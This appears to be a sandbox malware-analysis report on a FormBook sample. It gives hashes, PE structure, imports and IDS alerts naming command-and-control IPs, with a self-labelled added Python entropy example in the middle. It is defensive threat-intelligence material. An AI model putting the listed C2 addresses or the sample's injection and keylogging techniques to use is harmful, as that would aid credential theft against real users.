REGISTER-ASIT | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 195.110.124.133
REGISTER-ASIT | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | 195.110.124.133
REGISTER-ASIT | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse | 195.110.124.133
REGISTER-ASIT | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
REGISTER-ASIT | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | 195.110.124.133
SEDO-ASDE | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | RvJVMsNLJI.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 64411-18.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 11-17.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
SEDO-ASDE | Certificate 11-142024.exe | Get hash | malicious | FormBook | Browse | 91.195.240.94
No context
No context
Process: C:\Users\user\Desktop\CCE 30411252024.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.9940973679667575
Encrypted: true
SSDEEP: 6144:ifeaFuj/hHL/3XU74J+TDIH1MSjPHu/pL:iWaFuj/hr/3y4J+n21MCHAB
MD5: 457A73CA775687E15CE189249A02FA48
SHA1: 45D4C45F06CD4881A22885928235F9475A32083E
SHA-256: 929D4D680AAD8E03D3834335E46F31E1F6A38B37032287809DA68793D10168E2
SHA-512: 52C1A76D1F751EC3A3D0D365061CD6FDBAF381E5863AFEDB623729EE196BA7B4F9E051DCFA1CA8B60BD2BBA41CC782EBA863710CDB723229361F059194C52153
Malicious: false
Reputation: low
                                                                                      Preview:..r..YHYHi.Z..p.WT...gGY..VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6.Y7ZTF.WH.F.r.I..m.?>CkB=+6E*[v:V446<y*To&&7h.;l....&]+!.:F<rY7ZZYHY10F.n9/.h,(.jP,.U...qV1.-..t9/.U...t'2..>4XvR(.Q7K6VY7Z..HY.0NT.1..ULOWW0K2.DS6@7]Y7J^YHYH1OTSY.RULOGW0K.KDQ7.6VI7ZZ[HYN1OTSYHGSLOWW0K2OdU7K4VY7ZZYJY..OTCYHWULOWG0K"ODQ7K6FY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OT}--?!LOW.?O2OTQ7K&RY7JZYHYH1OTSYHGULoWWPK2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1OTSYHGULOWW0K2ODQ7K6VY7ZZYHYH1
                                                                                      Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1239949490932863
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.124867476343508
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:CCE 30411252024.exe
                                                                                      File size:1'191'424 bytes
                                                                                      MD5:ace5b81f6392ca5ce9a2e0953e6d6e4e
                                                                                      SHA1:bb0a075a44d599c7976703e186e1a70f891f9163
                                                                                      SHA256:74c3f1d43d2fbd0eeab386cb0086150568cef240d65b2efd0061721d6a0514ed
                                                                                      SHA512:2194cbf1ce6d06ad5e973c3abb736d71c21e5f93094f9b2cfd67b76157ac02f1616d7eaf9d0c2f98cbed67b5b90d29d1f239482cc7bbcb2e41f901da53e49b25
                                                                                      SSDEEP:24576:ntb20pkaCqT5TBWgNQ7ahZiAQWAw+JS60Koqm6O6A:kVg5tQ7ahQA8MKoqO5
                                                                                      TLSH:B745C02373DD8361C7B25273BA25B701BEBF782506A1F56B2FD4093DE920122525EA73
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                      Icon Hash:aaf3e3e3938382a0
                                                                                      Entrypoint:0x425f74
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67442143 [Mon Nov 25 07:03:31 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                      Instruction
                                                                                      call 00007F10BCCBD89Fh
                                                                                      jmp 00007F10BCCB08B4h
                                                                                      int3
                                                                                      int3
                                                                                      push edi
                                                                                      push esi
                                                                                      mov esi, dword ptr [esp+10h]
                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                      mov eax, ecx
                                                                                      mov edx, ecx
                                                                                      add eax, esi
                                                                                      cmp edi, esi
                                                                                      jbe 00007F10BCCB0A3Ah
                                                                                      cmp edi, eax
                                                                                      jc 00007F10BCCB0D9Eh
                                                                                      bt dword ptr [004C0158h], 01h
                                                                                      jnc 00007F10BCCB0A39h
                                                                                      rep movsb
                                                                                      jmp 00007F10BCCB0D4Ch
                                                                                      cmp ecx, 00000080h
                                                                                      jc 00007F10BCCB0C04h
                                                                                      mov eax, edi
                                                                                      xor eax, esi
                                                                                      test eax, 0000000Fh
                                                                                      jne 00007F10BCCB0A40h
                                                                                      bt dword ptr [004BA370h], 01h
                                                                                      jc 00007F10BCCB0F10h
                                                                                      bt dword ptr [004C0158h], 00000000h
                                                                                      jnc 00007F10BCCB0BDDh
                                                                                      test edi, 00000003h
                                                                                      jne 00007F10BCCB0BEEh
                                                                                      test esi, 00000003h
                                                                                      jne 00007F10BCCB0BCDh
                                                                                      bt edi, 02h
                                                                                      jnc 00007F10BCCB0A3Fh
                                                                                      mov eax, dword ptr [esi]
                                                                                      sub ecx, 04h
                                                                                      lea esi, dword ptr [esi+04h]
                                                                                      mov dword ptr [edi], eax
                                                                                      lea edi, dword ptr [edi+04h]
                                                                                      bt edi, 03h
                                                                                      jnc 00007F10BCCB0A43h
                                                                                      movq xmm1, qword ptr [esi]
                                                                                      sub ecx, 08h
                                                                                      lea esi, dword ptr [esi+08h]
                                                                                      movq qword ptr [edi], xmm1
                                                                                      lea edi, dword ptr [edi+08h]
                                                                                      test esi, 00000007h
                                                                                      je 00007F10BCCB0A95h
                                                                                      bt esi, 03h
                                                                                      jnc 00007F10BCCB0AE8h
                                                                                      movdqa xmm1, dqword ptr [esi+00h]
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [ASM] VS2012 UPD4 build 61030
                                                                                      • [RES] VS2012 UPD4 build 61030
                                                                                      • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x59c5c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x11e000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x59c5c | 0x59e00 | 1db49100f2c45021900588671d8f73ec | False | 0.9285085622392212 | data | 7.898011344639996 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11e000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xc9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xca148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xca6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc410 | 0x51331 | data | | | 1.0003337412392925
RT_GROUP_ICON | 0x11d744 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x11d7bc | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x11d7d0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x11d8ac | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
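The Entropy (8bit) and Encrypted fields in the dropped-file entries above, and the ZLIB Complexity column in the section and resource tables, are cheap randomness measures over raw bytes. The Python below is an added example, not part of the Joe Sandbox report, that computes the same three figures (Shannon entropy, compressed-size ratio, and a derived encrypted flag) over constructed inputs: a seeded pseudo-random blob standing in for the 270848-byte dropped data file and a near-empty SQLite-style file standing in for the dropped browser database. Joe Sandbox's exact cut-off for the Encrypted flag is not stated on the page; the 7.5 bits-per-byte threshold is an assumption, as are the sample names.

```python
"""Added example (not from the Joe Sandbox report): reproduce the
randomness measures the report prints for dropped files and resources.
Inputs are constructed in make_samples(); nothing from the sample is read.
"""
import hashlib
import math
import random
import zlib
from collections import Counter

# Assumed cut-off for the report's "Encrypted: true" flag; the page does
# not state the threshold Joe Sandbox actually uses.
ENCRYPTED_ENTROPY_THRESHOLD = 7.5


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 for empty input, max 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def zlib_complexity(data: bytes) -> float:
    """Compressed size divided by original size, as in the report's ZLIB
    Complexity column. Values near or above 1.0 mean incompressible bytes
    (stored deflate blocks plus header overhead), i.e. packed or encrypted."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def describe(data: bytes, threshold: float = ENCRYPTED_ENTROPY_THRESHOLD) -> dict:
    """Mirror the per-file fields of the report's dropped-files entries."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": ent,
        "zlib_complexity": zlib_complexity(data),
        "encrypted": ent >= threshold,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


def make_samples() -> dict:
    """Constructed stand-ins (names are hypothetical): a deterministic
    pseudo-random 64 KiB blob, and a 16 KiB file that carries only the
    SQLite magic string followed by zero bytes."""
    rng = random.Random(20241125)
    blob = bytes(rng.getrandbits(8) for _ in range(64 * 1024))
    db = b"SQLite format 3\x00" + bytes(16 * 1024 - 16)
    return {"payload.bin": blob, "browser.db": db}


if __name__ == "__main__":
    for name, data in make_samples().items():
        d = describe(data)
        print(f"{name}: size={d['size']} entropy={d['entropy']:.4f} "
              f"zlib={d['zlib_complexity']:.4f} encrypted={d['encrypted']} "
              f"md5={d['md5']}")
```

Read against the report, the 270848-byte data file (entropy 7.994, Encrypted: true), the .rsrc section (entropy 7.898) and the 332,593-byte RT_RCDATA resource with a ZLIB complexity above 1.0 form one pattern: a compiled AutoIt binary whose script resource and dropped blob are opaque to compression. These measures only say "opaque"; a compressed but unencrypted archive scores the same, so they justify further unpacking, not a verdict on their own.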
                                                                                      DLLImport
                                                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                      UxTheme.dllIsThemeActive
                                                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, 
SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll: SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-02T14:31:14.937130+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49794 | 154.215.72.110 | 80 | TCP
2024-12-02T14:31:48.840215+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49874 | 116.50.37.244 | 80 | TCP
2024-12-02T14:33:12.635919+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 49928 | 85.159.66.93 | 80 | TCP
2024-12-02T14:33:27.520840+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50023 | 91.195.240.94 | 80 | TCP
2024-12-02T14:33:50.947332+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50027 | 66.29.149.46 | 80 | TCP
2024-12-02T14:34:06.414054+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50033 | 195.110.124.133 | 80 | TCP
2024-12-02T14:34:38.079364+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.6 | 50038 | 217.196.55.202 | 80 | TCP
